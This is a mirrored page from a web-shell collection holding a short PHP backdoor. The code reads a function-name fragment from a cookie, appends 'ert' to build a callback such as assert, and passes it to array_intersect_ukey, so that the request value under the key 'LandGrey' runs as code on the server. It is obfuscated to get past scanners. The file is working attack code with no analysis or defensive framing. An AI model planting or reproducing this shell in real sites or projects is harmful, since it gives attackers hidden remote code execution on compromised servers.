mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
10 lines
193 B
PHP
10 lines
193 B
PHP
|
<?php
|
||
|
/**
|
||
|
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
||
|
*
|
||
|
*/
|
||
|
$password = "LandGrey";
|
||
|
$ch = $_COOKIE["set-domain-name"];
|
||
|
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert");
|
||
|
?>
|